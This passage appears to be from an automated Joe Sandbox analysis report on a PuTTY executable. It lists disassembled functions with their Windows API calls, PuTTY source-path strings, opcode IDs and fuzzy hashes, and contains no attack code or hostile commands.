                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: BreakClearCloseCommHandle
                      • String ID: End of file reading from serial device$Error reading from serial device
                      • API String ID: 2685284230-2629609604
                      • Opcode ID: 6b940f01f1906fba524d6160f98413788f3c4b408632774ccdbae814a42b0c1e
                      • Instruction ID: 669d8681720e16f6eb4f8e1419aff96a37f96ec6308d8fb75294e247eb96a99d
                      • Opcode Fuzzy Hash: 6b940f01f1906fba524d6160f98413788f3c4b408632774ccdbae814a42b0c1e
                      • Instruction Fuzzy Hash: 7221F923725A0651EA209B36E45477B6B60AF84BF0F244231CF6D837E5DF2CD8419304
                      Function 00007FF6785D5F70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ClientDesktopInfoMonitorRectWindow
                      • String ID: (
                      • API String ID: 2130016935-3887548279
                      • Opcode ID: 869da3f85202917f2c61634726657b6b3a3b36bd00f5317e1fd6675bc692818f
                      • Instruction ID: 2d816725d9b81cbdfc30d559e0bd51fd9aefde6fe550eb6bfccb9914ba1a0445
                      • Opcode Fuzzy Hash: 869da3f85202917f2c61634726657b6b3a3b36bd00f5317e1fd6675bc692818f
                      • Instruction Fuzzy Hash: FE01FC22A2C74251FA104B31F84937A7B50BF54B54F645134DE4CC6764DF3CE9C59B04
                      Function 00007FF6785D7A30 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00007FF67869C0A4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF67868D346,?,?,?,00007FF67868D367,?,?,?,00007FF67868E81E), ref: 00007FF67869C0CA
                      • GetDC.USER32 ref: 00007FF6785D7A74
                      • SelectPalette.GDI32 ref: 00007FF6785D7A8F
                        • Part of subcall function 00007FF67869B8AC: _set_error_mode.LIBCMT ref: 00007FF67869B8D3
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: FeaturePalettePresentProcessorSelect_set_error_mode
                      • String ID: !wintw_hdc$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c
                      • API String ID: 1342517984-2668247132
                      • Opcode ID: c065ac4635c1f0759df8e9c676d8566245b5593f7b757a7f583dcd20f9dfe9d9
                      • Instruction ID: 97b94297d2367effc6f6fbe07eaf0db365bc2a97493c18aea35b2f75f83ce92d
                      • Opcode Fuzzy Hash: c065ac4635c1f0759df8e9c676d8566245b5593f7b757a7f583dcd20f9dfe9d9
                      • Instruction Fuzzy Hash: 97F0C216E39523A0FA64AB75A8847761BA1AF54B50F354434CC0DC6B90CF2CAE95EB28
                      Function 00007FF678604F93 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35timeCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CommErrorLast$StateTimeouts
                      • String ID: Configuring %s flow control$RTS/CTS
                      • API String ID: 274883806-1158513486
                      • Opcode ID: b44b983fce4d9b2e235623982e55ae96984ee89bacc88950a70bcf185397aa82
                      • Instruction ID: a67a6ec95193f39e2ad191d1db734ace296009eada202949c7593c40a49ef6d8
                      • Opcode Fuzzy Hash: b44b983fce4d9b2e235623982e55ae96984ee89bacc88950a70bcf185397aa82
                      • Instruction Fuzzy Hash: E101D863E2C50292FA20CB35E44416B6B50FF85780FB05231DA4DD6548DE7CEE81DB48
                      Function 00007FF678604FAE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34timeCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CommErrorLast$StateTimeouts
                      • String ID: Configuring %s flow control$DSR/DTR
                      • API String ID: 274883806-321787297
                      • Opcode ID: 8d2c00cf09faffd8e0b3d28f9d1cb581a55208df61ddbcf782eb45095b8adc03
                      • Instruction ID: d0d34de230393431de3fc6d5a5302772a2e73135d37ed3a219b9d0958ac46199
                      • Opcode Fuzzy Hash: 8d2c00cf09faffd8e0b3d28f9d1cb581a55208df61ddbcf782eb45095b8adc03
                      • Instruction Fuzzy Hash: 0A01F723E2C60292EA21CB35E44516B6B50AF85780FB05232DE4DD665CDF7CEEC19B48
                      Function 00007FF678604F85 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32timeCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CommErrorLast$StateTimeouts
                      • String ID: Configuring %s flow control$XON/XOFF
                      • API String ID: 274883806-924046750
                      • Opcode ID: a70ff8559d2b74fca675b73aac0676894a8e70ad610177dad5fa9eb6180550c0
                      • Instruction ID: 4af5df8f4b3c0130b1293e0ab8a861f4a7d9abed3f0fea66eb28e3efd6b39ba8
                      • Opcode Fuzzy Hash: a70ff8559d2b74fca675b73aac0676894a8e70ad610177dad5fa9eb6180550c0
                      • Instruction Fuzzy Hash: A9F0A223E2C602A1FA218B31A40417B5B50AF85784FB05131DE4DD664CDE7CEE81AB48
                      Function 00007FF6785D9320 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28threadCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CloseCreateHandleThread_set_error_mode
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$clipboard == CLIP_SYSTEM
                      • API String ID: 968033324-2875968380
                      • Opcode ID: 46bf761cc5357dcfeca289972916d49e9bf58f751565e4c51b3a682671c676ec
                      • Instruction ID: ec6186e58ff3517c28a14a58902e138403ef0df5744864ad8d3f7ff67760a53c
                      • Opcode Fuzzy Hash: 46bf761cc5357dcfeca289972916d49e9bf58f751565e4c51b3a682671c676ec
                      • Instruction Fuzzy Hash: E5F0A923A2964295FB54DB31E84916A2BA0FF99744FB40035D94D86794DF3CE904DB08
                      Function 00007FF6786B5E04 Relevance: 6.2, APIs: 4, Instructions: 159COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _invalid_parameter_noinfo$_get_daylight
                      • String ID:
                      • API String ID: 72036449-0
                      • Opcode ID: 75843eea22079b8a28dd496c4e350b59208ed88a5f1ec6f92c35adb0e747cde9
                      • Instruction ID: cd08832e28da1a50abb88f56eb824901ed8cc59cd4f03bde565ba9929e645e0e
                      • Opcode Fuzzy Hash: 75843eea22079b8a28dd496c4e350b59208ed88a5f1ec6f92c35adb0e747cde9
                      • Instruction Fuzzy Hash: 0651C633D2C252E6F7695938A5093FBAE44AF4071CF394135F64DC61DACE2CEC41AA4A
                      Function 00007FF6785F5CB0 Relevance: 6.1, APIs: 4, Instructions: 117windowCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID:
                      • API String ID: 3015471070-0
                      • Opcode ID: c53fec7fff811f6bb79265c08811edeec95500fd11b080b5312f59ea6d46d473
                      • Instruction ID: d855073c5c5856db994f446715f0de3cb84fb503920d023589598aaa122bb937
                      • Opcode Fuzzy Hash: c53fec7fff811f6bb79265c08811edeec95500fd11b080b5312f59ea6d46d473
                      • Instruction Fuzzy Hash: DE41E433A2955186FAA08B21A948B3E7B90FB65794F654330CE5983784DF3DAD419F08
                      Function 00007FF6785D9C50 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Color
                      • String ID:
                      • API String ID: 2811717613-0
                      • Opcode ID: 217ffbfbbca57e0f98a7bd9ebae0c02fa65dafaf6720f8fc0dea7ed2a10c52aa
                      • Instruction ID: 32d45ca12de53dffa3750b8fd8b451ad6f5bba08d8695267321044c8a1d275de
                      • Opcode Fuzzy Hash: 217ffbfbbca57e0f98a7bd9ebae0c02fa65dafaf6720f8fc0dea7ed2a10c52aa
                      • Instruction Fuzzy Hash: AD31900315C2C146E331D3B9681119B6F51EBE9384F54027AEECD47B8BCD2CCA06CBA9
                      Function 00007FF6785D1F89 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Rect$InvalidateWindow$ClientDestroyProc
                      • String ID:
                      • API String ID: 3789280143-0
                      • Opcode ID: 80ad04d1cd51cbcf71c79e559fe8f0604cac8142e46c7db8df3712c76460e334
                      • Instruction ID: 00f77244df27ce520d5ade70833b796886c6db1ef56da360245439fe69a5ca30
                      • Opcode Fuzzy Hash: 80ad04d1cd51cbcf71c79e559fe8f0604cac8142e46c7db8df3712c76460e334
                      • Instruction Fuzzy Hash: A7319033E2858696F754DB35E8426BA3B90AB98754F204035CD0DC7B96DD3CF985AF08
                      Function 00007FF6785D6BD0 Relevance: 6.0, APIs: 4, Instructions: 42windowCOMMON
                      Download Yara Rule
                      APIs
                      • DeleteObject.GDI32 ref: 00007FF6785D6C21
                      • DestroyIcon.USER32(00000000,00000000,00000000,00007FF6785D6077,?,?,?,?,00007FF67864A920,?,?,?,?,00007FF678613528), ref: 00007FF6785D6C32
                      • DeleteObject.GDI32 ref: 00007FF6785D6C5B
                      • CoUninitialize.OLE32(00000000,00000000,00000000,00007FF6785D6077,?,?,?,?,00007FF67864A920,?,?,?,?,00007FF678613528), ref: 00007FF6785D6C70
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: DeleteObject$DestroyIconUninitialize
                      • String ID:
                      • API String ID: 1128191211-0
                      • Opcode ID: a66b6740aff3e8cf8d15a9e642f8c74887d25acfd22a1c9a1c92b402c24d2bce
                      • Instruction ID: e173e6a12c216ec5010acf85b3decc3c14de2e2a7e3b5e274189af5aa92ba925
                      • Opcode Fuzzy Hash: a66b6740aff3e8cf8d15a9e642f8c74887d25acfd22a1c9a1c92b402c24d2bce
                      • Instruction Fuzzy Hash: DB11A023E28A03A0FB546F70AC842762E50AF14B70F310331D83EC61E1DE2CAC06A75C
                      Function 00007FF6786AE244 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 209fileCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ErrorFileLastRead
                      • String ID: MZx
                      • API String ID: 1948546556-2575928145
                      • Opcode ID: a9df9c85f04fb2dd16403e166051e429f6c8123a871e395cd67d26eb5e7c112b
                      • Instruction ID: fa153ce1c67917629dd5d4dc4562f516ca209fcff3f31e5156558a29cf9633dc
                      • Opcode Fuzzy Hash: a9df9c85f04fb2dd16403e166051e429f6c8123a871e395cd67d26eb5e7c112b
                      • Instruction Fuzzy Hash: 1091271BB2C6A6A5F7215A34944037E6F81AB52F94F384235CA4EC72D5CE3CDC46E306
                      Function 00007FF678619F10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 174COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/unicode.c$p - mbstr < mblen
                      • API String ID: 626452242-1134606155
                      • Opcode ID: e1f5720bcf4309deea2da40c1ac1e7931b163e311a1a09669df6bf7a2a865389
                      • Instruction ID: c9db3498cab8fe98b59e0277a550ef950061bb310568761d71295f130662ee8d
                      • Opcode Fuzzy Hash: e1f5720bcf4309deea2da40c1ac1e7931b163e311a1a09669df6bf7a2a865389
                      • Instruction Fuzzy Hash: 6C61C623F3C69665EA208B22A45427BBBA1BF44B95F640035DE4DC7796DE3CE844E708
                      Function 00007FF6786AD230 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ErrorFileLastWrite
                      • String ID: U
                      • API String ID: 442123175-4171548499
                      • Opcode ID: 0c5543f92d4ffb37be7eaca806808697015f89918511715fcd2ed829bb6a8460
                      • Instruction ID: 7b9c979b324777700dc9947ae2deea6b66b3667c869afa173eee3f4301c381de
                      • Opcode Fuzzy Hash: 0c5543f92d4ffb37be7eaca806808697015f89918511715fcd2ed829bb6a8460
                      • Instruction Fuzzy Hash: 1C41D423B28A51A6EB109F35E4483AA6B60FB98784F504031EF4DC7758EF3CD841D745
                      Function 00007FF6785F9A60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6785F9AAE
                      • c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00007FF6785F9AA7
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                      • API String ID: 3015471070-2883471717
                      • Opcode ID: 1f8e08e8db5f812005c54b442ea56d0b4140d6f98dd6dbec8a4671db2507f039
                      • Instruction ID: 1612712d83b47e7b14fee34527bd1b6e987a69c4ade0c06cf0d65ca9464e310f
                      • Opcode Fuzzy Hash: 1f8e08e8db5f812005c54b442ea56d0b4140d6f98dd6dbec8a4671db2507f039
